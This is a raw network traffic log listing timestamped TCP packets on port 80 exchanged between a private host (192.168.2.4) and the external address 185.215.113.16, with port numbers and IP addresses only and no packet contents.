Nov 11, 2024 01:14:22.989758968 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989761114 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989769936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989788055 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989788055 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989799976 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989809990 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989809990 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989821911 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989836931 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989849091 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989860058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989860058 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989871025 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989881992 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989892960 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989893913 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989906073 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989917040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989917994 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989938974 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989943027 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989953995 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989965916 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989990950 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990012884 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990025043 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990035057 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990046024 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990050077 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990084887 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990180016 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990196943 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990206957 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990216970 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990226984 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990227938 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990240097 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990251064 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990261078 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990272045 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990277052 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990287066 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990298986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990312099 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990314960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990323067 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990334034 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990338087 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990345955 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990355968 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990355968 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990362883 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990367889 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990372896 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990385056 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990417957 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990453959 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990472078 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990482092 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990492105 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990497112 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990509033 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990520000 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990533113 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990533113 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990545034 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990556002 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990567923 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990569115 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990588903 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990595102 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990607023 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990617037 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990627050 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990647078 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990668058 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990696907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990709066 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990725040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990735054 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990744114 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990747929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990761042 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990772009 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990776062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990787029 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990797997 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990807056 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990813971 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990849018 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990885973 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990897894 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.990937948 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.990964890 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991009951 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991020918 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991039991 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991041899 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991053104 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991064072 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991069078 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991075039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991085052 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991108894 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991146088 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991166115 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991178036 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991188049 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991199970 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991213083 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991216898 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991229057 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991239071 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991239071 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991262913 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991286039 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991324902 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991337061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991348028 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991358042 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991368055 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991372108 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991385937 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991395950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991396904 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991408110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991420031 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991426945 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991432905 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991436005 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991446018 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991458893 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991467953 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991477966 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991488934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991501093 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991501093 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991513014 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991523027 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991523981 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991537094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991544008 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991548061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991559982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991570950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991578102 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991581917 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991594076 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991605997 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991614103 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991619110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991631031 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991642952 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991647005 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991653919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991667032 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991677999 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991684914 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991697073 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991708040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991708994 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991745949 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991758108 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991769075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991791964 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991827011 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991883039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991914034 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991925001 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991926908 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991944075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.991961002 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.991983891 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.992033005 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.992044926 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.992055893 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.992067099 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.992069960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.992079973 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.992091894 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.992094994 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.992136002 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993340015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993351936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993362904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993374109 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993385077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993396044 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993396044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993413925 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993413925 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993432999 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993443012 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993446112 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993458033 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993460894 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993469954 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993480921 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993493080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993495941 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993510008 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993521929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993532896 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993535995 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993546009 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993551016 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993557930 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993568897 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993581057 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993592978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993596077 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993606091 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993618011 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993626118 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993629932 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993639946 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993643045 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993665934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993669033 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993679047 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993686914 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993691921 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993705034 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993715048 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993717909 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993732929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993745089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993746996 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993760109 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993769884 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993772030 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993784904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993788004 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993798018 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993810892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993820906 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993824005 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993839025 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993849993 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993853092 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993860960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993861914 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993875027 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993885994 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993897915 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.993916035 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.993943930 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.994854927 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.994867086 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.994878054 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.994889975 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.994900942 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.994910955 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.994923115 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.994923115 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.994934082 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.994946003 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.994950056 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.994957924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.994966984 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.994970083 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.994987965 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.994991064 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.995003939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.995014906 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.995018959 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.995027065 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.995039940 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.995045900 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.995055914 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.995066881 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.995070934 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.995078087 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.995083094 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.995090961 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.995102882 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.995110035 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.995115995 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.995126009 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.995137930 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.995141029 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.995150089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.995157003 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.995167017 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.995172024 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.995181084 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.995202065 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.995229959 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.995954037 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.996098042 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.010132074 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010190964 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.010241032 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010252953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010262966 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010278940 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010281086 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.010292053 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010303020 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010313988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010327101 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010332108 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.010339022 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.010343075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010354996 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010365009 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.010365963 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010377884 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010389090 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010392904 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.010407925 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010418892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010421038 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.010432005 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010442972 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010452986 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.010452986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010464907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010476112 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010478973 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.010487080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010497093 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010504007 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.010508060 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010515928 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.010519981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010545015 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.010548115 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010560036 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010567904 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.010576010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010588884 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010598898 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010601997 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.010611057 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010622978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010628939 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.010634899 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.010637999 CET	49762	80	192.168.2.4	185.215.113.16
